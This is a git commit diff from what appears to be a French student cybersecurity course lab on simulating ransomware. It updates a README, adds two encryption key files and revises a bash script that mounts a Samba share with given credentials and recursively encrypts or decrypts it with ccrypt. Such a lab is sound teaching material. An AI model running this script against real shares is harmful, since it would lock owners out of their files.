Modification des fichiers du TP sur la simulation du ransomware, et

ajout de deux clés: une de test, et la vraie clé.
2024-11-18 10:45:27 +01:00 · 2024-11-18 10:45:27 +01:00 · bcff0b9ebc
commit bcff0b9ebc
parent cd8c794bc3
4 changed files with 18 additions and 10 deletions
--- a/bts_annee_2/cyber2/ransomware-simulation/README.md
+++ b/bts_annee_2/cyber2/ransomware-simulation/README.md
@ -1,2 +1,3 @@
-Dossier avec le script utilisé pour simuler une attaque de ransomware sur un partage Samba accessible en écriture, avec un mot de passe et nom d'utilisateur connus.
-Les arguments passés après le nom du script sont utilisés plus tard et sont nécessaires.
+Séance sur la simulation d'un *ransomware* sur un partage de fichiers Samba.
+Le mode d'emploi du script est dans celui-ci.
+Pour générer une clé d'encryption/décryption, on peut faire ceci: `date | sha512sum > macle.txt`.
--- a/bts_annee_2/cyber2/ransomware-simulation/cle.txt
+++ b/bts_annee_2/cyber2/ransomware-simulation/cle.txt
@ -0,0 +1 @@
+f1822d2fe58daeadc88e0e4eef2f155fc3edd3713ff9a5d1e27696afd9231d905db51c98dcf0c6416658239b8d3b5893c5775ffd7941f769a78fcd684c5f9161
--- a/bts_annee_2/cyber2/ransomware-simulation/smbcc.sh
+++ b/bts_annee_2/cyber2/ransomware-simulation/smbcc.sh
@ -1,34 +1,39 @@
 #!/bin/bash
-# déclaration des variables
+
+# Usage :
+# bash smbcc.sh <chemin du partage Windows AVEC IP> <nom d'utilisateur/mot de passe> <action> <clé d'encryption>
+
+# Déclaration des variables.
 chemin=$1
 cred=$2
 action=$3
 ficcle=$4

-# récup du mot de passe et nom d'utilisateur
+# Récupération du nom d'utilisateur et du mot de passe.
 user=$(echo $cred| cut -d "/" -f1)
 pass=$(echo $cred| cut -d "/" -f2)

-# créa du répertoire et on monte dessus
+# Création du répertoire s'il n'existe pas, et montage du partage Samba dessus.
 [[ -e /mnt/samba ]] || mkdir /mnt/samba
 mount.cifs -o "username=$user,password=$pass" "//${chemin}" /mnt/samba

-# vérification d'erreurs
+# Première vérification d'erreurs.
 if [[ $? != 0 ]] ; then
 	rmdir /mnt/samba
 	exit 1
 fi

-# la commande ccrypt
+# Commande ccrypt pour encrypter ou décrypter le répertoire avec le partage.
 ccrypt "$action" -r -k $ficcle /mnt/samba

-# vérification d'erreurs
+# Seconde vérification d'erreurs.
 if [[ $? != 0 ]] ; then
-	echo "ccrypt échoué, revérifie le script."
+	echo "Échec de ccrypt, veuillez relancer le script après avoir vérifié les paramètres."
+	umount /mnt/samba
 	exit 1
 fi

-# nettoyage et sortie, code 0
+# Nettoyage des directoires, et sortie du script avec le code 0.
 umount /mnt/samba
 rmdir /mnt/samba
 exit 0
--- a/bts_annee_2/cyber2/ransomware-simulation/test.txt
+++ b/bts_annee_2/cyber2/ransomware-simulation/test.txt
@ -0,0 +1 @@
+0d7b9fea61b5707ff8bf6da489a2638153e8c5d74d3bfab9a12dca6698da3ef61441cf86b819b166cae673efc97c99cb3ab8022c62774636f9e8fe18771a13db  -
				`@ -0,0 +1 @@`
				`f1822d2fe58daeadc88e0e4eef2f155fc3edd3713ff9a5d1e27696afd9231d905db51c98dcf0c6416658239b8d3b5893c5775ffd7941f769a78fcd684c5f9161`
				`@ -0,0 +1 @@`
				`0d7b9fea61b5707ff8bf6da489a2638153e8c5d74d3bfab9a12dca6698da3ef61441cf86b819b166cae673efc97c99cb3ab8022c62774636f9e8fe18771a13db -`